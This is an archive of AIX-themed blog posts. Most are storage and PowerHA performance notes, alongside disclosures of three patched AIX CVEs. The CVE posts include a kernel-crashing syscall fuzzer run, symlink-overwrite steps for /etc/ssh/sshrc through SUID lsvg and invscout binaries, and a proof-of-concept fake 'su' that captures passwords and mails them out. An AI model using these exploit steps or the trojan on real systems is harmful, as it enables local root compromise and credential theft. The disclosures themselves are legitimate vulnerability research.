Archive for the ‘AIX’ Category

CVE-2012-0723: first worlds AIX system call fuzzer and it’s interesting results

Monday, October 7th, 2013

I’ve been intrigued for a long by the so called fuzzers, I’ve wanted to give it a try on AIX some time ago. Let’s take one of the most recent AIX release that i had at that time, e.g. 6.1 Technology Level #6 Service Pack #4 (btw it works on 7.1.0.0 too):

$ oslevel -s
6100-06-04-1112
$ id
uid=100(guest) gid=100(usr)
$
$ ./ble
[After a while system reboots]

root@XYZ:# errpt -j 67145A39 -A
---------------------------------------------------------------------------
LABEL:          DUMP_STATS
Date/Time:       Fri Sep 16 05:06:17 EDT 2011
Type:            UNKN
Resource Name:   SYSDUMP
Description
SYSTEM DUMP
Detail Data
DUMP DEVICE
/dev/lv_dumplv
DUMP SIZE
             242688512
TIME
Fri Sep 16 05:04:31 2011
DUMP TYPE (1 = PRIMARY, 2 = SECONDARY)
           1
DUMP STATUS
           0
ERROR CODE
0000 0000 0000 0000
DUMP INTEGRITY
Compressed dump - Run dmpfmt with -c flag on dump after uncompressing.

FILE NAME

PROCESSOR ID
           0
root@XYZ:#

[..]

(0)> where
pvthread+011200 STACK:
[004CEB5C]rmsock+00001C (F3FCC00000000000 [??])
[00003850]ovlya_addr_sc_flih_main+000130 ()
[kdb_get_virtual_memory] no real storage @ 2FF22AC8
[1000070C]1000070C ()
[kdb_read_mem] no real storage @ FFFFFFFFFFF9610

(0)>

On different system 6100-03-01-0921:

(0)> where
pvthread+00AF00 STACK:
[0043DCFC]rmsock+00001C (F3FC000000000000 [??])
[00003844].svc_instr+000144 ()
[kdb_get_virtual_memory] no real storage @ 2FF229D0
[10000590]10000590 ()
[kdb_read_mem] no real storage @ FFFFFFFFFFF9680
(0)>

As you can see above it attempted any random syscall but on rmsock() – executed by non privileged user – it rebooted system (because of attributes on sys0 device that cause to reboot kernel in case of kernel panic). Typical Denial of Service attack, isn’t it?

Now let’s try something more intelligent (found during the research) – using only syscall number 793 on version 6100-06-04-1112:

$ ./ble 793
using only sc=793

.. and the system is dead. In AIX kernel debugger session on dump file after reboot you can see that even the system vector call instruction handler seems to be not visible, perhaps indicating some kind of memory overwrite in kernel space. (Probably) this could be exploited with finding offset of privilege access structure handling all UID/GIDs

(0)> where
pvthread+018C00 STACK:
[0001BF00]abend_trap+000000 ()
[000C585C]xm_bad_free+00025C (??, ??, ??, ??)
[000C4F30]xmfree+0004F0 (??, ??)
[046A7868]ptx_get_ndd_tree+000088 (??, ??, ??, ??, ??)
[00003850]ovlya_addr_sc_flih_main+000130 ()
[kdb_get_virtual_memory] no real storage @ 2FF22AC8
[1000070C]1000070C ()
[kdb_read_mem] no real storage @ FFFFFFFFFFF9640

(0)>
[..]
(0)> ppid 06400D8
              SLOT NAME     STATE      PID    PPID          ADSPACE  CL #THS

pvproc+019000  100*ble      ACTIVE 06400D8 07700C8 0000000848B32480   0 0001

[..]
IDENTIFIER. uid        :00000064  ........... suid       :00000064
........... pid        :006400D8  ........... ppid       :007700C8
........... sid        :006E0092  ........... pgrp       :006400D8
[..]
(0)> nm pvproc
Symbol Address : F1000F0A00000000
   TOC Address : 02B65540

(0)>

so as you can see UID of our “ble” system call fuzzing process was 0×64 (or in 100 if you are uncomfortable with hex notations). By changing value at address 0xF1000F0A00000000+0×19000 one could get root shell probably, but researching my way to do that could be very time intensive.

And sample from most recent AIX 7.1 that I was having access to:

guest@hostA:# oslevel -s
7100-00-03-1115
guest@hostA:# ./ble 766
using only sc=766

… and the system is dead:

(2)> where
pvthread+011100 STACK:
[F1000000C01E06CC]dupb+00000C (0000000030CBEE17 [??])
[F1000000C01E05DC]dupmsg+00001C (??)
[00014D70].hkey_legacy_gate+00004C ()
[0000386C]ovlya_addr_sc_flih_main+00014C ()
[kdb_get_virtual_memory] no real storage @ FFFFFFFF3FFFE60
[kdb_read_mem] no real storage @ FFFFFFFFFFF95F0

(2)>

IBM has been notified months ago, patch has been released some time ago:http://aix.software.ibm.com/aix/efixes/security/syscall_advisory.asc (affects AIX 5.3, 6.1 and 7.1 plus all VIOS too). Happy patching :)

-J.

CVE-2012-2179: lsvg(1) AIX61/71 – libodm.a vulnerable due to the ODMERR env

Thursday, July 12th, 2012

This is new local attack for at least AIX 6.1 / 7.1 or at least there were enough time for anyone seriously considering security to patch their systems (IBM released info on 2012-06-22, today is 2012-07-12) … this is typical arbitrary file overwrite symlink vulnerability due to libodm.a bug giving local root. libodm.a (in this case used by SUID lsvg) performs an getenv(“ODMERR”) – undocumented env variable – which if is set triggers the debug code to dump the contents of debug log message generated in runtime by libodm.a to always the same file – ODMTRACE0 (or ODMTRACE1, etc) in current runtime directory (seems to be related to getcwd()). Proof:

guest@XXX:# oslevel -s
7100-00-03-1115
guest@XXX:# export ODMERR=1
guest@XXX:# ln -s /etc/ssh/sshrc ODMTRACE0
guest@XXX:# ls -l
total 0
lrwxrwxrwx    1 install  staff            14 Dec 22 05:42 ODMTRACE0 ->
/etc/ssh/sshrc
guest@XXX:# umask 0000
guest@XXX:# lsvg
rootvg
appvg
guest@XXX:# ls -l
total 0
lrwxrwxrwx    1 install  staff            14 Dec 22 05:42 ODMTRACE0 ->
/etc/ssh/sshrc
guest@XXX:# head -3 ODMTRACE0
 __odm_initfini_init: Start
 __odm_initfini_init: End
 odm_set_path: Start
guest@XXX:# ls -l /etc/ssh/sshrc
-rw-rw-rw-    1 root     staff          7332 Dec 22 05:42 /etc/ssh/sshrc
guest@XXX:#
guest@XXX:# vi /etc/ssh/sshrc
# a lot of typing
guest@XXX:# cat /etc/ssh/sshrc
#!/bin/sh
# proof of concept for lsvg(1) AIX61/71 0-day exploit, 22/12/2011, vnull
#
# /etc/environment usually sets PATH from scratch so we have to
# cheat via ~/.profile which is read by user's shell at later stage
#

mkdir /tmp/$$
cat > /tmp/$$/su << EOF
#!/bin/bash
#this would be a su backdoor sendming email or transmiting pw over dns...
echo -e "root's Password: \c"
stty -echo
read PW
stty echo
echo
#echo your PW is \$PW
echo \$USER \$HOSTNAME \$PW | mail -s cookie your@email.com >
/dev/null 2>&1
echo '[compat]: 3004-300 You entered an invalid login name or password.'
echo
echo '3004-501 Cannot su to "root" : Authentication is denied.'
rm -f /tmp/$$/su
exit 0
EOF
chmod 755 /tmp/$$/su

cat >> ~/.profile << EOF
export PATH=/tmp/$$:$PATH
EOF

guest@XXX:#

How does it work? If the above attack is performed, and somebody else logs in using ssh remotely (root or just simple user), then /etc/ssh/sshrc contents are executed (by sshd) with his privilege level. In this case PATH is altered to hijack “su” executions and obtain potentially password. This could be also adapted e.g. to catch “sudo” password too.

Potential workaround: drop all SUIDs from all binaries linked to libodm.a (yes i find it kind of hard due to need of dropping even SUID from lsvg, which may break a lot of IBM/3rd software, especially some agents using commands such as lsvg to monitoring stuff.

Fixed via CVE-2012-2179, more info here http://aix.software.ibm.com/aix/efixes/security/libodm_advisory.asc

Still IBM AIX doesn’t come with proper hardened protection against /tmp races as mentioned in previous blog entry about CVE-2011-1384. Timeline: almost 180 days to fix for IBM.

BTW: This proof of concept could be easily adapted to give instant root (as you can create any file that does not exists), but I’m not going to disclose weaponized versions.

-J.

CVE-2011-1384 AIX inventory scout file deletion and symlink vulnerability

Thursday, December 29th, 2011

It’s been two weeks after publishing official advisory by IBM for this vulnerability in AIX 5.3 (not tested by me) 6.1 (tested by me) and 7.1 (also tested by me) here http://aix.software.ibm.com/aix/efixes/security/invscout_advisory2.asc so i’m going to talk a little bit about technical details. The attack is very trivial and it exists due to the SUID binary invscoutClient_VPD_Survey installed by default in any version of AIX.

guest@XXX:# ln -s /etc/ssh/sshrc /tmp/invtemp.log
guest@XXX:# umask 0000
guest@XXX:# /opt/IBMinvscout/bin/invscoutClient_VPD_Survey
/var/adm/invscout/8204-E8A_101D2B2_21_VPD.xml
guest@XXX:# ls -l /etc/ssh/sshrc
-rw-rw-rw-    1 root     staff         12591 May 20 03:18 /etc/ssh/sshrc
guest@XXX:# cat > /etc/ssh/sshrc
#!/bin/sh
# place your commands here to be executed as owned users
echo HACKED > /I_WAS_HERE
guest@XXX:# ls -l /etc/ssh/sshrc
-rw-rw-rw-    1 root     staff            36 May 20 03:19 /etc/ssh/sshrc
guest@XXX:#
guest@XXX:# oslevel -s
6100-06-02-1044       <-- YAY!
guest@XXX:#
guest@XXX:# ls -l /opt/IBMinvscout/bin/invscoutClient_VPD_Survey
-r-sr-xr-x    1 root     system     11779340 Jun 30 2010  /opt/IBMinvscout/bin/invscoutClient_VPD_Survey
guest@XXX:#

So what happens is that invscoutClient_VPD_Survey overwrites (or creates) anything located under /tmp/invtemp.log… even if it really exists. If it doesn’t exists (soft link to non-existing file such as e.g. /etc/ssh/sshrc) then it is created using default umask. Of course all of this works on every non-privileged user…

There are many attack vectors but I’m presenting /etc/ssh/sshrc here mainly because it is one of the simplest ones. After such attack nothing happens until someone logs into the box using SSH, then for example OpenSSH daemon is going to read and execute the contents of /etc/ssh/sshrc under the privileges of the logging in user (e.g. guest can hijack “admin” account or “root” account if that one is used e.g. for routine SSH activities after SSH key exchange; if only “admin” could be taken over, one can simply escalate privileges to “root” by installing hijacked version of “su” or “sudo” binary and altering $PATH – this would allow stealing root’s password and/or privileges)

Fixing is very trivial for this one, just follow the guide by IBM (yup, dropping the SUID does nothing wrong for your system).

Timeline is as follows:

  • Discovered: 19.05.2011
  • Submitted to IBM: 24.06.2011
  • 1st IBM response: 05.07.2011

Next ones to follow… however one thing worries me the most. Whole world knows about such kind class of attacks, but there is not a single major vendor on this planet that would prevent such kind of attacks from happening by hardening the OS kernel. For example GRSecurity and OpenWall projects are completely different, such kind of protection (symlink races, /tmp protection) exists for almost a decade there… but those are kernel patches for Linux, not something I would consider mainstream… unfortunately. GRSecurity is really excellent piece of work, they have implemented a realistic protection against realistic technical real-world flaws. So my question is simple, is any of the major OS vendors is interested in realistic security at all?

There is a also a very good discussion about /tmp UNIX/POSIX problems and general poor written code on LWN. Also the list of similar attacks is pretty long (as of writing 264 vulnerabilities).

Solution could be pretty obvious at the heart/kernel of such system as AIX, just implement logic such as following pseudo C code inside open(2)/creat(2) system calls:

[..]
#define AM_I_WRITING O_RDWR | O_CREAT | O_WRONLY | O_APPEND
if((flags & AM_I_WRITING) != 0) {

   if(is_symlink(fd) && symlink_endpoint_owner_is_different_user(fd, current_user)) {
      return -EACCES;
   }
}
[..]

This may not be the best solution as GRSecurity has something like this, which may be much better suited for this particular problem:

config GRKERNSEC_LINK
bool “Linking restrictions”
help
If you say Y here, /tmp race exploits will be prevented, since users
will no longer be able to follow symlinks owned by other users in
world-writable +t directories (e.g. /tmp), unless the owner of the
symlink is the owner of the directory. users will also not be
able to hardlink to files they do not own. If the sysctl option is
enabled, a sysctl option with name “linking_restrictions” is created.

WAFL performance VS sequential reads: part III, FC LUN performance from AIX vs read_realloc

Thursday, July 7th, 2011

Continuing my series about LUN fragmentation in WALF (part1, part2) I wanted to give a try to read_realloc option. Mostly the same storage system (still DataOnTap 7.3.2) and settings were used with an exception that i’ve even used more powerful AIX with POWER7 CPU cores system (shouldn’t matter as i was completely not constrained with CPU power during the benchmarks).

The methodology was simple:
1) Do a lot of random and sequential writes to JFS2 on top of that LUN on FlexVol having read_realloc=off to fragment the LUN as much as possible
2) Start a loop of random large reads (simulating let’s say many random full table scans of up to 1MB in Oracle data file) on top of that JFS2 filesystem (BTW: this time without CIO)

The full measurement took something about 18 hours (yes, storage was hammered 18 hours all the time with just reads). Results are pretty interesting:

… it basically shows how Netapp storage can self-optimize and adapt based on the workload. Now i’m just wondering how it works under the hood (i.e. what is the trade-off or worst possible scenario for this kind of setting). What was even more interesting is that reallocate measure indicated after the whole cycle that the LUN was really nicely de-fragmented:

Thu Jul  7 03:32:20 EDT [X: wafl.reallocate.check.value:info]: Allocation measurement check on '/vol/fc_fill_aggr_sm/lun' is 3.

AIX disk I/O pacing vs PowerHA

Wednesday, July 6th, 2011

Recently i’ve played with disk I/O pacing (technically minpout and maxpout parameters) on AIX 6.1. The root cause of this investigation is based on some high I/O waits in production. The default AIX 6.1 and 7.1 systems are coming with maxpout set to 8193 and minpout respecitvletly to 4096. However old deployments and HACMP <= 5.4.1 installations procedures are still recommending setting value of 33/20, just take a look on some old High Availability Cluster Multi-Processing Troubleshooting guide:
“Although the most efficient high- and low-water marks vary from system to system, an initial high-water mark of 33 and a low-water mark of 24 provides a good starting point. These settings only slightly reduce write times and consistently generate correct fallover behavior from the HACMP software.”

Additionally IBM described the whole disk I/O pacing mechanics in this link

100% write results with maxpout=8193 minpout=4096 (defaults)
orion_20110706_0525_summary.txt:Maximum Large MBPS=213.55 @ Small=0 and Large=6
orion_20110706_0525_summary.txt:Maximum Small IOPS=32323 @ Small=2 and Large=0

100% write results with maxpout=33 minpout=24 (old HACMP)
orion_20110706_0552_summary.txt:Maximum Large MBPS=109.64 @ Small=0 and Large=10
orion_20110706_0552_summary.txt:Maximum Small IOPS=31203 @ Small=5 and Large=0

As you can see there is drastic change when it comes to large sequential writes, but don’t change that parameters yet! You really need to read the following sentence from the IBM site “The maxpout parameter specifies the number of pages that can be scheduled in the I/O state to a file before the threads are suspended. “. It is obvious that those parameters are set for the reason of avoiding I/O resource hungry processes dominating the CPU. If you take that the smallest page size is 4kB with 64kB automatically used sometimes by Oracle you might get 33*64kB = 2112kB value in best case, after which thread doing the I/O is suspended ! Ouch! So what is the process of taking the CPU from active process? It is called involuntary context switch…

Why it is all important with HACMP/PowerHA software? Because it is implemented as normal shell scripts and some RSCT processes which are mostly not running in kernel mode at all (at least everything below PowerHA 7.1)! The only way PowerHA/HACMP can give more CPU horse power to the processes needing is to give them higher priority on the run queue, just take a look on the PRI column..

root@X: /home/root :# ps -efo "sched,nice,pid,pri,comm"|sort -n +3|head
SCH NI     PID PRI COMMAND
  - --  520286  31 hatsd
  - --  729314  38 hats_diskhb_nim
  - --  938220  38 hats_nim
  - --  622658  39 hagsd
  - 20  319502  39 clstrmgr
  - 20  348330  39 rmcd
  - 20  458874  39 gsclvmd
  - 20  508082  39 gsclvmd
  - 20  528554  39 gsclvmd
root@X: /home/root :#

.. but it appears that even that could not be not enough in some situations. As you can see there is no easy answer to that question and you would have to drive your exact system configuration to 99/100% of CPU utilization on all POWER cores to see if you are not getting random failovers, because e.g. some HACMP process would not get heartbeat too late due to the CPU scheduling. So perhaps the way forward for 33/20 environments here is to leave them somewhere between 33/20 and 8193/4096 (like the mentioned 513/256 in the IBM manuals). Another thing is that you should never have a system driven to > 80% CPU usage on all physical cores, but you should now that already:)

WAFL performance VS sequential reads: part I, FC LUN performance from AIX vs FlexVol utilization

Friday, June 24th, 2011

Some time ago i’ve started thinking about getting more serious about performance research on AIX6.1, PowerHA and Oracle stack on top of Netapp storage. One of the first things that i wanted to measure was how the Netapp’s WALF handles FlexVolume utilization in correlation to space usage. In theory long sequential reads (as like in Oracle Datawarehouses in which i’m interested) could be affected because of the fragmentation introduced by WAFL (Write *Anywhere* File System).

Some specs first:

  • DataONTap version 7.3.2, single Netapp controller 3160 was tested (but in cluster).
  • The test was done using Oracle’s Orion 11.1.0.7 storage benchmarking tool on top of AIX (orion_aix_ppc64 -run advanced -num_disks 5 -cache_size 2048 -write 30 -duration 20 -type rand -matrix basic) – as you can see the read vs write ratio was 70% to 30%, but only long reads were presented (i was not interested in the performance of 8kB reads/writes, just 1MB long reads)
  • AIX was connected via VFCs to two separate VIOS, which each were connected using 2 FC 8 GBps links each (but running in 4 GBps mode due to the Brocade SAN switches not supporting 8 GBps)
  • Netapp controller was having 4 GBps ports
  • AIX was using 6.1′s internal MPIO (round-robin) for the tested LUN
  • AIX hdisk for LUN was set to the default value of 12 (as per Netapp Host Attachement Kit)
  • AIX JFS2 filesystem was mounted with Concurrent I/O to prevent AIX from caching and read-aheads (still AIX had 3GB of RAM allocated but VMM should not use it)
  • Netapp storage controller was having 4 processors, 8GB RAM and 2GB for NVRAM (as indicated by sysconfig output, of course as this is cluster, only 1GB was available)
  • LUN size was 20GB, on top of 50GB FlexVol on RAID-DP aggregate with 5x FC 15k RPM disks
X> vol options full_aggr_test
nosnap=off, nosnapdir=off, minra=off, no_atime_update=off, nvfail=off,
ignore_inconsistent=off, snapmirrored=off, create_ucode=on,
convert_ucode=off, maxdirsize=83804, schedsnapname=ordinal,
fs_size_fixed=off, compression=off, guarantee=volume, svo_enable=off,
svo_checksum=off, svo_allow_rman=off, svo_reject_errors=off,
no_i2p=off, fractional_reserve=100, extent=off, try_first=volume_grow,
read_realloc=off, snapshot_clone_dependency=off
X> df -Ag aggr_used
Aggregate                total       used      avail capacity
aggr_used               1102GB      668GB      433GB      61%
aggr_used/.snapshot         0GB        0GB        0GB     ---%
X>
X> snap list -A aggr_used
Aggregate aggr_used
working...

No snapshots exist.
X> snap sched -A aggr_used
Aggregate aggr_used: 0 0 0
X>

WALF aggregate was idle during that test and configured and running as follows:

Aggregate aggr_used (online, raid_dp) (block checksums)
  Plex /aggr_used/plex0 (online, normal, active)
    RAID group /aggr_used/plex0/rg0 (normal)

      RAID Disk Device  HA  SHELF BAY CHAN Pool Type  RPM  Used (MB/blks)    Phys (MB/blks)
      --------- ------  ------------- ---- ---- ---- ----- --------------    --------------
      dparity   2d.18   2d    1   2   FC:B   -  FCAL 15000 418000/856064000  420156/860480768
      parity    1d.19   1d    1   3   FC:A   -  FCAL 15000 418000/856064000  420156/860480768
      data      2d.21   2d    1   5   FC:B   -  FCAL 15000 418000/856064000  420156/860480768
      data      1d.22   1d    1   6   FC:A   -  FCAL 15000 418000/856064000  420156/860480768
      data      2d.23   2d    1   7   FC:B   -  FCAL 15000 418000/856064000  420156/860480768

[..]

X> aggr status aggr_used -v
           Aggr State           Status            Options
       aggr_used online          raid_dp, aggr     nosnap=off, raidtype=raid_dp,
                                                  raidsize=16,
                                                  ignore_inconsistent=off,
                                                  snapmirrored=off,
                                                  resyncsnaptime=60,
                                                  fs_size_fixed=off,
                                                  snapshot_autodelete=on,
                                                  lost_write_protect=on
[..]

X> df -g full_aggr_test
Filesystem               total       used      avail capacity  Mounted on
/vol/full_aggr_test/       50GB       20GB       29GB      40%  /vol/full_aggr_test/
/vol/full_aggr_test/.snapshot        0GB        0GB        0GB     ---%  /vol/full_aggr_test/.snapshot
X>
X> snap list full_aggr_test
Volume full_aggr_test
working...

No snapshots exist.
X>

From AIX point of view, filesystem was configured as follows (notice those big files for Orion’s use):

root@Y:# df -m .
Filesystem    MB blocks      Free %Used    Iused %Iused Mounted on
/dev/fslv00    19456.00   2099.70   90%        7     1% /fullaggr
root@Y:# du -sm *
10000.01        bigfile
7353.00 bigfile2
0.00    lost+found
0.00    orion.lun
root@Y:#

Results:

Methodology:
For each next attempt a snapshot was created to grow the space used inside the FlexVol until it was full (40%..100%). There was single Orion execution after each snapshot was created.The Y-axis represents maximum bandwidth observed for sequential 1MB reads (as reported by Orion). The Z-axis (depth) ranging from 1 to 10 reprents the number of concurrent/paralell reads being done by Orion (to let’s say simulate multiple full table scans happening on the same LUN). As it is visible from the graph when FlexVol utilization is close or equal to 100% a nearly more than double performance impact can be observed (40-45 MB/s vs 10-15MB/s). The sane FlexVol utilization minimium seems to somewhere max at 70% to avoid problems with fragmentation. AIX system was mostly coming with default settings without any more advanced optimizations (that was done on purpose except Concurrent I/O).

PowerHA failure scenario when dealing with SAN-booted LPARs – part IV

Thursday, June 9th, 2011

If you are wondering how the story ended up, then just be sure to read IBM PowerHA SystemMirror 7.1 for AIX. It appears that full clustering support for LPARs having their rootvg on SAN is starting to be properly supported fon versions of PowerHA higher than 7.1…

The rootvg system event
PowerHA SystemMirror 7.1 introduces system events. These events are handled by a new
subsystem called clevmgrdES. The rootvg system event allows for the monitoring of loss of
access to the rootvg volume group. By default, in the case of loss of access, the event logs an
entry in the system error log and reboots the system. If required, you can change this option
in the SMIT menu to log only an event entry and not to reboot the system.

and later:
The rootvg system event
As discussed previously, event monitoring is now at the kernel level. The
/usr/lib/drivers/phakernmgr kernel extension, which is loaded by the clevmgrdES
subsystem, monitors these events for loss of rootvg. It can initiate a node restart operation if
enabled to do so as shown in Figure 9-9.
PowerHA 7.1 has a new system event that is enabled by default. This new event allows for the
monitoring of the loss of the rootvg volume group while the cluster node is up and running.
Previous versions of PowerHA/HACMP were unable to monitor this type of loss. Also the
cluster was unable to perform a failover action in the event of the loss of access to rootvg. An
example is if you lose a SAN disk that is hosting the rootvg for this cluster node.

PowerHA failure scenario when dealing with SAN-booted LPARs – part III

Tuesday, April 12th, 2011

Ok, this is part III of the rather long story. As shown in last series the problem was really tricky, we cannot run anything in the event of loosing storage (you cannot read binaries if you don’t have storage). Ok, so how HACMP/PowerHA deals with it?

If you lose all storage Virtual FibreChannel connections, this is going to reported as a loss of quorum for a VG in AIX’s error reporting facility. In theory this error should be propagated to HACMP/PowerHA failover mechanism so that RG is evacuated from the affected node. Sometimes this behaviour is titled as “selective failover behavior”. Technical details are pretty interesting as it shows the lack of real/solid integration between AIX kernel and HACMP/PowerHA. Primary source of information is AIX RAS reporting facility (see “man errpt” for more info) and the errdemon process. Errdemon takes proper actions based on the configuration of “errnotify” ODM objects. The installation of PowerHA adds special hooks so that any special messages about failing hardware/OS/probes (in this case loosing of quorum on VGs) are propagated to the HACMP/PowerHA scripts. This can be verified as follows:

root@jkwha001d : /home/root :# odmget errnotify | tail -17

errnotify:
        en_pid = 0
        en_name = "clSF1"
        en_persistenceflg = 1
        en_label = "LVM_SA_QUORCLOSE"
        en_crcid = 0
        en_class = "H"
        en_type = "UNKN"
        en_alertflg = ""
        en_resource = "LVDD"
        en_rtype = "NONE"
        en_rclass = "NONE"
        en_symptom = ""
        en_err64 = ""
        en_dup = ""
        en_method = "/usr/es/sbin/cluster/diag/clreserror $9 $1 $6 $8"
root@jkwha001d : /home/root :#
root@jkwha001d : /home/root :# /usr/lib/errdemon -l
Error Log Attributes
--------------------------------------------
Log File                /var/adm/ras/errlog
Log Size                1048576 bytes
Memory Buffer Size      32768 bytes
Duplicate Removal       true
Duplicate Interval      10000 milliseconds
Duplicate Error Maximum 1000
root@jkwha001d : /home/root :#

.. so the method of rescuing from losing SAN storage (also on SAN booted hosts) seems to be the script /usr/es/sbin/cluster/diag/clreserror. Of course this script is also located on SAN in that particular case…

root@jkwha001d:# ls -l /usr/es/sbin/cluster/diag/clreserror
-r-x------    1 root     system        13813 Feb 24 2009  /usr/es/sbin/cluster/diag/clreserror
root@jkwha001d:# file /usr/es/sbin/cluster/diag/clreserror
/usr/es/sbin/cluster/diag/clreserror: shell script  - ksh (Korn shell)
root@jkwha001d:# head -45  /usr/es/sbin/cluster/diag/clreserror
#!/bin/ksh93
[..]
#
#  Name:        clreserror
#
#   Notify method in errnotify stanzas that are configured for Selective
#   Fallover triggered by (AIX) Error Notification.
#   This function is merely a wrapper for clRMupdate.
#
#   Argument validation is performed in the clRMapi.
#
#  Arguments:
#
#       $1      Error Label, corresponds to errnotify.en_label
#       $2      Sequence number of the AIX error log entry
#       $3      Resource Name, corresponds to errnotify.en_resource
#       $4      Resource class, corresponds to errnotify.en_class
#
#       Argument validation is performed in the clRMapi.
#
#       Environment:  PATH
#
root@jkwha001d:#

And rest assured that this script calls a lot of other scripts, of course that can be unavailable if the rootvg is on the same physical storage as the affected VG.

There are two good findings here actually. First one is that if you are going to loose all SAN-based hdisks you are going to be flooded with thousands entries in errpt facility. Those can be undetected by errdemon because of the overflowing the log in memory. Workaround for the first case seems to be trivial, just enlarge the error log buffer. This is documented here:

root@jkwha001d : /home/root :# /usr/lib/errdemon -B 1048576
0315-175 The error log memory buffer size you supplied will be rounded up
to a multiple of 4096 bytes.
root@jkwha001d : /home/root :# /usr/lib/errdemon -l
Error Log Attributes
--------------------------------------------
Log File                /var/adm/ras/errlog
Log Size                1048576 bytes
Memory Buffer Size      1048576 bytes
Duplicate Removal       true
Duplicate Interval      10000 milliseconds
Duplicate Error Maximum 1000
root@jkwha001d : /home/root :#

Additionaly it seems to have some value mirroring some of the LVs on the affected VGs. This might add some stability to the detection of loosing LVM quorum, i.e – this shows properly mirrored LVM loglv4 across 2 hdisks(PVs)…

root@jkwha001d:# lsvg -p jw1data1vg
jw1data1vg:
PV_NAME           PV STATE          TOTAL PPs   FREE PPs    FREE DISTRIBUTION
hdisk5            active            479         30          00..00..00..00..30
hdisk3            active            479         30          00..00..00..00..30
root@jkwha001d:# lsvg -l jw1data1vg
jw1data1vg:
LV NAME             TYPE       LPs     PPs     PVs  LV STATE      MOUNT POINT
jw1data1            jfs2       896     896     2    open/syncd    /oracle/JW1/sapdata1
loglv04             jfs2log    1       2       2    open/syncd    N/A
root@jkwha001d:# lslv loglv04
LOGICAL VOLUME:     loglv04                VOLUME GROUP:   jw1data1vg
LV IDENTIFIER:      0001d2c20000d9000000012b86756f99.2 PERMISSION:     read/write
VG STATE:           active/complete        LV STATE:       opened/syncd
TYPE:               jfs2log                WRITE VERIFY:   off
MAX LPs:            512                    PP SIZE:        32 megabyte(s)
COPIES:             2                      SCHED POLICY:   parallel
LPs:                1                      PPs:            2
STALE PPs:          0                      BB POLICY:      relocatable
INTER-POLICY:       minimum                RELOCATABLE:    yes
INTRA-POLICY:       middle                 UPPER BOUND:    128
MOUNT POINT:        N/A                    LABEL:          None
MIRROR WRITE CONSISTENCY: on/ACTIVE
EACH LP COPY ON A SEPARATE PV ?: yes
Serialize IO ?:     NO
root@jkwha001d:#

Second finding is that even with all those changes it has very high probability of failing (i.e. PowerHA RG move won’t work). Personally the risk is so high that for me it is nearly a guarantee. The only proper solution of this problem that i am able to see is to add special handler to the err_method in errdemon code. Something like err_method = KILL_THE_NODE. This KILL_THE_NODE should be implemented internally by running all the time errdemon process. The process should be running with memory protected from swapping (something like mlockall())… because currently it is not running that way.

root@jkwha001d:# svmon -P 143470
-------------------------------------------------------------------------------
     Pid Command          Inuse      Pin     Pgsp  Virtual 64-bit Mthrd  16MB
  143470 errdemon         24851    11028        0    24700      N     N     N

     PageSize                Inuse        Pin       Pgsp    Virtual
     s    4 KB                 323          4          0        172
     m   64 KB                1533        689          0       1533

    Vsid      Esid Type Description              PSize  Inuse   Pin Pgsp Virtual
   7c05d         d work fork tree                    m   1041   233    0    1041
                   children=4d6cdc, 0
    8002         0 work fork tree                    m    492   456    0     492
                   children=802760, 0
   4d0f7         2 work process private             sm    131     4    0     131
   35309         3 clnt mapped file,/dev/hd9var:69   s    107     0    -       -
   110c0         f work shared library data         sm     41     0    0      41
   1d023         1 clnt code,/dev/hd2:44058          s     25     0    -       -
   45115         - clnt /dev/hd2:63900               s     11     0    -       -
   3902a         - clnt /dev/hd9var:1015             s      8     0    -       -
root@jkwha001d:#

Hope that IBM fixes that. There is no APAR because I’m lazy… i even don’t want to fight with 1st line of support… BTW: i’m not the first one who noticed this problem, please see here for a blog post about the same from Ricardo Gameiro

-Jakub.

PowerHA failure scenario when dealing with SAN-booted LPARs – part II

Monday, January 24th, 2011

Ok, this is part II of the post PowerHA failure scenario when dealing with SAN-booted LPARs – part I.

The first scenario we have performed was to disable 100% of the MPIO storage paths to the active HACMP node by un-mapping Virtual FibreChannel adapters (vadapters from both VIOS protecting the active node [LPAR]). On both VIOS we have performed the following command:

$ vfcmap -vadapter vfchostXYZ -fcp

where the vfchostXYZ was server-side (or better VIOS side) vadapter handling FC I/O traffic for this LPAR. The result? The LPAR with HACMP/PowerHA active Resource Groups on it (jkwha001d) after some time evicted itself from the HACMP cluster, and the old passive node jkwha002d became the active one (Oracle started there). The root cause of the jkwha001d LPAR is the following one:

root@jkwha001d : /home/root :# errpt
IDENTIFIER TIMESTAMP  T C RESOURCE_NAME  DESCRIPTION
AFA89905   0103071611 I O grpsvcs        Group Services daemon started
97419D60   0103071611 I O topsvcs        Topology Services daemon started
A6DF45AA   0103071111 I O RMCdaemon      The daemon is started.
67145A39   0103070911 U S SYSDUMP        SYSTEM DUMP
F48137AC   0103070911 U O minidump       COMPRESSED MINIMAL DUMP
DC73C03A   0103070911 T S fscsi0         SOFTWARE PROGRAM ERROR
9DBCFDEE   0103070911 T O errdemon       ERROR LOGGING TURNED ON
26623394   0103070511 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070511 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070511 T H fscsi1         COMMUNICATION PROTOCOL ERROR
(..)
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
DE3B8540   0103070411 P H hdisk4         PATH HAS FAILED
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
